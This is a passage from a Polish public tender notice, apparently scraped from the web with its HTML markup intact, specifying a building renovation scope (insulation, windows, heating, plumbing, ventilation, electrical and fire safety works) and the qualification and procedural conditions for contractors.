wykonanie izolacji z folii paroizolacyjnej mocowanej do spodu belek stropowych;ł)	wykonanie zabudowy sufitów z płyt GKF o grubości 15 mm 2-warstwowo w systemie danej firmy w celu uzyskania odporności ogniowej REI60 wraz z obudową kanałów wentylacji nawiewno-wywiewnej;m)	montaż wewnętrznych parapetów z granitu szlifowanego o grubości 3 cm wystających ok. 5 cm poza lico ściany;n)	malowanie tynków wewnętrznych farbami emulsyjnymi zmywalnymi oraz lamperii farbą olejną z 2-krotnym szpachlowaniem (pomieszczenie biblioteki, nr 6, 7 oraz nr 3) - kolorystyka do uzgodnienia z Zamawiającym;o)	wykonanie lamperii z tynku mozaikowego na bazie żywicy - pomieszczenie nr 4;p)	montaż stolarki drzwiowej wewnętrznej fabrycznie wykończonej: drzwi oddzielające poszczególne pomieszczenia od komunikacji ogólnej (klatki schodowej) w klasie odporności ogniowej EI30; w drzwiach zamontowane zamki patentowe - kolorystyka do uzgodnienia z Zamawiającym; przy drzwiach odbojniki zabezpieczające ściany przed obiciem;r)	montaż ścianki szklonej o odporności ogniowej EI60;s)	montaż schodków opuszczanych o wymiarach 60x80 cm w klasie odporności ogniowej EI30;6.	Klatka schodowa:a)	skucie cokolików na podestach i biegach schodowych;b)	demontaż balustrad schodowych i pochwytów;c)	usunięcie lamperii z farby olejnej;d)	zeskrobanie starej farby i zmycie tynków wewnętrznych, zagruntowanie oraz wykonanie gładzi gipsowych 2-warstwowych (bez lamperii), rozbiórka podsufitki z desek tynkowanych;e)	wyszpałdowanie podstopnic schodów wewnętrznych;f)	wykonanie posadzek oraz okładzin stopni schodowych wraz z wykonaniem cokolików wys. 10 cm z płytek gresowych lakierowanych antypoślizgowych - wzory i kolorystyka do uzgodnienia z Zamawiającym;g)	wykonanie izolacji z folii paroizolacyjnej mocowanej do spodu belek stropowych;h)	wykonanie okładziny z płyt GKF o grubości 15 mm 2-warstwowo w systemie danej firmy w celu uzyskania odporności ogniowej REI60 wraz z obudową kanałów wentylacji nawiewno-wywiewnej;i)	montaż wewnętrznych parapetów z granitu szlifowanego o grubości 3 cm wystających ok. 5 cm poza lico ściany;j)	malowanie tynków wewnętrznych farbami emulsyjnymi zmywalnymi - kolorystyka do uzgodnienia z Zamawiającym;k)	wykonanie lamperii do wysokości 150 cm (mierząc od poziomu posadek i stopni schodowych) z tynku mozaikowego na bazie żywicy (całość klatki schodowej) - kolorystyka do uzgodnienia z Zamawiającym;l)	wykonanie otworu w stropie i montaż klapy dymowej jednoskrzydłowej o podstawie prostej wysokości 0,70 m o wymiarach 100x230 cm z owiewkami i dyszą;ł)	montaż balustrad schodowych z rur ze stali nierdzewnej o wysokości 110 cm z zamontowanymi zabezpieczeniami uniemożliwiającymi zjeżdżanie po balustradzie (kulki o średnicy 25 mm mocowane do pochwytu co ok. 150 cm - wg załączników Nr 1 i Nr 2); montaż pochwytów z rury nierdzewnej - schody wewnętrzne wejściowe oraz zejście do części podpiwniczenia;m)	wywiezienie gruzu z rozbieranych elementów na składowisko odpadów innych niż niebezpieczne i obojętne wraz z kosztami składowania materiałów rozbiórkowych;n)	montaż gaśnic typu ABC o ładunku 4 kg na każde 50 m2 powierzchni pożarowej budynku zakwalifikowanej do kategorii zagrożenia ludzi Zl oraz 4 kg na każde 300 m2 powierzchni zakwalifikowanej do kategorii PM; o)	montaż oznakowania urządzeń p.pożarowych oraz dróg ewakuacyjnych.7.	Roboty dociepleniowe ścian, przegród zewnętrznych i posadzki na gruncie:a)	docieplenie ścian zewnętrznych przy gruncie z zastosowaniem styropianu wodoodpornego XPS grubości 10 cm o współczynniku ?=0,031 W/mK wraz z robotami towarzyszącymi: rozbiórka istniejącego utwardzenia z płyt chodnikowych betonowych i kostki betonowej, wykonanie wykopów wąskoprzestrzennych przy budynku do poziomu fundamentów, oczyszczenie istniejącego podłoża ścian, wykonanie izolacji pionowej przeciwwilgociowej poprzez 3-krotne posmarowanie roztworem bitumicznym na zimno, założenie folii kubełkowej, wykonanie zasypki piaskowej zagęszczanej warstwowo do stopnia Is=0,95, odtworzenie rozebranych nawierzchni utwardzonych;b)	docieplenie ścian zewnętrznych nadziemia budynku tzw. metodą lekką z przygotowaniem podłoża z zastosowaniem styropianu EPS 70 o grubości 14 cm (w ościeżach okiennych grubości 3 cm) o współczynniku ?=0,031 W/mK z zastosowaniem narożników ochronnych - kolorystyka elewacji (kolory niestandardowe wielobarwne w kolorach intensywnych do zaakceptowania przez Zamawiającego); wyprawa elewacyjna typu kornik o granulacji 2 mm z gotowej masy akrylowej; do wysokości 2,0 m od poziomu terenu należy zastosować dodatkową warstwę siatki zbrojącej; obowiązkowo należy zastosować listwę startową na cokole budynku: montaż i demontaż rusztowań oraz ogrodzenie tymczasowe terenu, na którym będą prowadzone roboty i składowane materiały: uporządkowanie przyległego terenu po zakończeniu robót - wyrównanie i obsianie trawą parkową;c)	docieplenie posadzek na gruncie w podpiwniczeniu z zastosowaniem styropianu podposadzkowego XPS 100 o grubości 5 cm wraz z robotami towarzyszącymi: wykonanie izolacji poziomej przeciwwilgociowej z folii izolacyjnej o grubości min. 0,2 mm oraz wykonanie warstwy wyrównawczej cementowej o grubości 70 mm z zastosowaniem zbrojenia rozproszonego;d)	docieplenie stropu tarasu metodą BSO z zastosowaniem styropianu EPS 70 o grubości 18 cm z wykonaniem tynku cienkowarstwowego z gotowej masy akrylowej;e)	docieplenie stropu nad poddaszem, a w tym rozbiórka istniejącej podłogi drewnianej, usunięcie zasypki-polepy, demontaż podsufitki z desek otynkowanych, uzupełnienie drewnianej konstrukcji stropu na zaprojektowanymi pomieszczeniami poddasza, wykonanie ocieplenia z wełny mineralnej o grubości 25 cm (15+10), założenie folii paroizolacyjnej od spodu stropu, wykonanie sufitu z płyt GKF 2x15 mm na ruszcie metalowym w systemie danej firmy o odporności ogniowej REI60, wykonanie podłogi na poddaszu z płyty OSB o grubości 25 mm;f)	docieplenie dachu istniejących i projektowanych pomieszczeń poddasza - rozbiórka istniejącej podsufitki z desek tynkowanych, wykonanie docieplenia dachu nad pomieszczeniami poddasza wełną mineralną o grubości 30 cm, zabudowa skosów poddasza 2 płytą GKF o grubości 15 mm w systemie REI60;g)	docieplenie stropodachu lukarn - rozbiórka deskowania dachu lukarn, rozbiórka podsufitki z desek tynkowanych, montaż folii paroizolacyjnej oraz zabudowa sufitów 2 płytą GKFo grubości 15 mm w systemie REI60, wykonanie docieplenia z wełny mineralnej o grubości 26 cm, wykonanie deskowania dachów z płyt OSB o grubości 22 mm, montaż obróbek blacharskich z blachy powlekanej w kolorze blachodachówki, wykonanie pokrycia 1 x papa bitumiczna oraz 2 x papa termozgrzewalna (papa wierzchniego krycia o grubości min. 5 mm modyfikowana SBS z wkładką zbrojącą min. 1200g/m2).8.	Wymiana stolarki okiennej:a)	wymiana istniejącej stolarki okiennej PCV na nowe okna z profili PCV w kolorze białym; okna uchylno-rozwieralne o współczynniku U<=0,9 w/m2K z wbudowanymi nawiewnikami higrosterowanymi; mechanizmy uchyłu skrzydeł okiennych dostępne z poziomu podłogi;b)	montaż podokienników wewnętrznych z konglomeratu pełnego o grubości 2 cm, szerokości ok. 30 cm wystające 3 cm poza lico ścian - wzór i kolorystyka do uzgodnienia z Zamawiającym;c)	montaż okien połaciowych o wymiarach 78x148 cm o współczynniku U<=0,9 w/m2K.9.	Wymiana stolarki drzwiowej zewnętrznej:a)	wymiana drzwi zewnętrznych wejściowych z profili PVC wzmocnionych o współczynniku U<=1,3 w/m2K z samozamykaczami; w każdych drzwiach zamontowane 2 zamki patentowe, zamiast klamek uchwyty trójkątne;b)	wymiana drzwi tarasowych z profili PVC o współczynniku U<=0,9 w/m2K; uchylno-rozwieralnych.10.	Wymiana instalacji centralnego ogrzewania:a)	demontaż istniejącej instalacji centralnego ogrzewania z rur stalowych wraz z grzejnikami żeliwnymi członowymi oraz płytowymi wraz z wywiezieniem zdemontowanych materiałów do punktu złomowania;b)	montaż instalacji centralnego ogrzewania natynkowo z rur stalowych ocynkowanych łączonych na zaprasowane łączniki;c)	montaż grzejników stalowych płytowych z zaworami termostatycznymi (wbudowanymi zaworami lub domontowanymi do grzejników wraz z głowicami termostaycznymi);d)	montaż w pomieszczeniach piwnicznych otulin termoizolacyjnych z okładziną aluminiowa oraz samoprzylepną zakładką;e)	dokonanie prób, sprawdzeń z dokonaniem regulacji potwierdzonych stosownymi protokołami;Całość instalacji należy wykonać zgodnie z projektem instalacji centralnego ogrzewania.11.	Wymiana instalacji wodno-kanalizacyjnej:a)	demontaż istniejącej instalacji wodociągowej z rur stalowych wraz z demontażem osprzętu sanitarnego oraz wywiezieniem zdemontowanych materiałów do punktu złomowania;b)	demontaż istniejącej instalacji kanalizacyjnej z rur żeliwnych i PVC wraz z demontażem osprzętu sanitarnego oraz wywiezieniem zdemontowanych materiałów do punktu utylizacji;c)	montaż instalacji wodociągowej z rur miedzianych łączonych przez lutowanie w bruzdach instalacyjnych i otulinach termoizolacyjnych odpowiedniej grubości;d)	montaż instalacji kanalizacyjnej z rur PVC łączonych na uszczelki pod posadzką piwnicy i w bruzdach ściennych z wyprowadzeniem ponad dach zakończonej kominkami wentylacyjnymi;e)	montaż osprzętu i wyposażenia sanitarnego wodno-kanalizacyjnego, w tym zawór antyskażeniowy I gatunku;f)	sprawdzenie, usprawnienie i spięcie istniejącej instalacji solarnej i zasobnika ciepłej wody użytkowej z nowo wykonaną instalacją wodociągową;g)	dokonanie prób, sprawdzeń potwierdzonych stosownymi protokołami, w tym próba szczelności, ciśnieniowa, płukanie i dezynfekcja instalacji oraz badanie wody.Całość instalacji należy wykonać zgodnie z projektem instalacji wodno-kanalizacyjnej.12.	Wykonanie wentylacji mechanicznej nawiewno-wywiewnej:a)	wykonanie przekuć przez stropy i ściany;b)	montaż centrali nawiewno-wywiewnej przedstawionej w projekcie budowlanym lubo parametrach równoważnych;c)	montaż przewodów kanałowych instalacji typu SPIRO instalacji z wraz z osprzętem;d)	wykonanie izolacji z wełny szklanej z płaszczem z folii aluminiowej;e)	montaż wentylatorów łazienkowych sprzężonych z wyłącznikiem oświetlenia;f)	montaż wentylatora dachowego o wydajności 500 m3/h;g)	zabudowa kanałów wentylacyjnych 2-warstwowa z płyt GKF o grubości 2x15 mm w systemie EI60;h)	montaż odcinającej klapy p.pożarowej z topikiem na przejściu instalacji nawiewno-wywiewnej przez przegrody oddzielenia pożarowego pomieszczeń o różnej klasyfikacji pożarowej;i)	na poziomie stropów co 2 kondygnacje szachty instalacyjne należy zabezpieczyć poprzez przegrody poziome odpowiadające klasyfikacji pożarowej danego stropu; przepusty o średnicy powyżej 0,04 m w ścianach i stropach nie będących elementami oddzielenia pożarowego pomieszczeń, dla których jest wymagana odpowiednia klasa odporności pożarowej REI lub EI powinny mieć odpowiednią dla danej przegrody klasę odporności ogniowej tych przegród: wykonanie zabezpieczeń należy potwierdzić wpisem kierownika budowy w dzienniku budowy, bądź pisemnym stosownym oświadczeniem kierownika budowy;j)	uruchomienie, wyregulowanie działania całego systemu instalacji nawiewno-wywiewnej potwierdzone stosownym protokołem.Całość instalacji należy wykonać zgodnie z projektem budowlanym instalacji nawiewno- wywiewnej.13.	Wymiana instalacji elektrycznej i odgromowej:a)	demontaż istniejącej instalacji elektrycznej i odgromowej wraz z osprzętem;b)	wykonanie instalacji elektrycznej i odgromowej w obiekcie wraz z montażem osprzętu, która obejmuje: instalację zasilenia gniazd i odbiorników elektrycznych, instalację oświetlenia podstawowego, oświetlenia awaryjnego i ewakuacyjnego, instalację oddymiania klatki schodowej, instalację odgromową wraz z wykonaniem uziomu otokowego.Instalacja odgromowa winna być wykonana z pręta ocynkowanego ?8 mm oraz bednarki ocynkowanej; na zwodach pionowych złącza kontrolne;Po wykonaniu instalacji należy sporządzić dokumentację powykonawczą (pomiary instalacji elektrycznej i odgromowej oraz badanie natężenia oświetlenia w poszczególnych pomieszczeniach i przy urządzeniach p.poż. - protokoły z pomiarów, sprawdzeń działania urządzeń i osprzętu p. pożarowego).14.	Roboty towarzyszące:a)	obsadzenie ściany zachodniej budynku pnączami samoczepnymi (bluszcz pospolity ,,Białystok") w pojemnikach C-3 o wysokości roślin 100-120 cm, rozstaw roślin - co 50 cm;b)	modernizacja instalacji c.w.u. poprzez zamontowanie dodatkowego zestawu solarnego w oparciu o odpowiedni podgrzewacz biwalentny oraz pozostałe niezbędne elementy instalacji wraz z wykonaniem koniecznych rozprowadzeń c.w.u. i włączeniem do istniejącej instalacji solarnej z dokonaniem próby działania całego zestawu solarnego; b)	wyposażenie obiektu w sprzęt gaśniczy i oznakowanie dróg ewakuacyjnych, zgodniez obowiązującymi przepisami, gaśnice w ilości min. 2 kg na 50 m2, piktogramy oznaczenia dróg i wyjść ewakuacyjnych, lokalizacji gaśnic oraz kierunków otwierania drzwi itp.Wszystkie materiały zastosowane do realizacji zadania muszą posiadać atesty, certyfikaty i aprobaty techniczne dopuszczające do stosowania w budownictwie (atesty, certyfikaty i aprobaty techniczne należy dostarczyć Zamawiającemu). Roboty objęte umową należy wykonać zgodnie m.in. z:?	projektami budowlanymi, ?	szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót, ?	ekspertyzą techniczną przeciwpożarową,?	opisem przedmiotu zamówienia, określonym w tej specyfikacji, oraz ?	ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2017 r. poz. 1332 z późn. zm.),?	ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2016 r. poz. 1570, z późn. zm.),?	rozporządzeniem Ministra Infrastruktury i Budownictwa z dnia 14 listopada 2017 r. zmieniające rozporządzenie w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2017 r. poz. 2285) oraz zgodnie ze sztuką budowlaną i zasadami współczesnej wiedzy technicznej,?	wszelkimi innymi obowiązującymi przepisami prawa.Zamawiający udostępnia przedmiary robót budowlanych i instalacyjnych jako element pomocniczy.Uwagi:Przed złożeniem oferty można zapoznać się z obiektem objętym przedmiotem zamówienia w celu sporządzenia należnej wyceny.Wszystkie nazwy własne podane zarówno w opisach rysunków jak i na rysunkach projektów oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych, a także przedmiarach należy traktować jako określenie standardu urządzeń, materiałów i rozwiązań technicznych. Parametry techniczno-eksploatacyjne zastosowanych urządzeń powinny być co najmniej takie, jak pokazanych na rysunkach oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych. Wymiary urządzeń i ich połączeń muszą być zgodne z podanymi na rysunkach, specyfikacjach technicznych wykonania i odbioru robót budowlanych oraz przedmiarach.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45214210-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2018-05-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-08-25</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże:?	wykonanie co najmniej jednej podobnej roboty w zakresie budowy/przebudowy/remontu budynku użyteczności publicznej lub budynku mieszkalnego o kubaturze nie mniejszej niż 1.500,00 m3.W przypadku wykazania przez Wykonawcę większej ilości robót, Zamawiający w celu dokonania oceny spełnienia w/w warunku będzie brał pod uwagę tylko ilość robót wymaganychprzez Zamawiającego.Do wykazanych pozycji muszą być załączone dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.?	że będzie dysponował:?	kierownikiem budowy w specjalności konstrukcyjno - budowlanej bez ograniczeń (lub równoważne),?	kierownikiem robót w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń (lub równoważne),?	kierownikiem robót w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub równoważne).Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej musi wykazać, że będzie dysponować osobą posiadającą kwalifikacje do kierowania: ?	robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń (lub równoważne),?	robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń (lub równoważne),?	robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (lub równoważne), w kraju siedziby lub zamieszkania, jeśli takie obowiązują w danym kraju.Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. Zamawiający dokona oceny spełnienia powyższych warunków oraz przesłanek braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego według formuły ,,spełnia - nie spełnia".</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w pkt 6.7.2a, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości (zamiast odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej).W/w dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt. 6.10 siwz stosuje się. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:a)	dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej: nie dotyczy.b) dotyczących zdolności technicznej lub zawodowej:?	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty,?	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający wymaga wniesienia wadium w wysokości 19.500,00 zł (słownie złotych: dziewiętnaście tysięcy pięćset 00/100). </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> 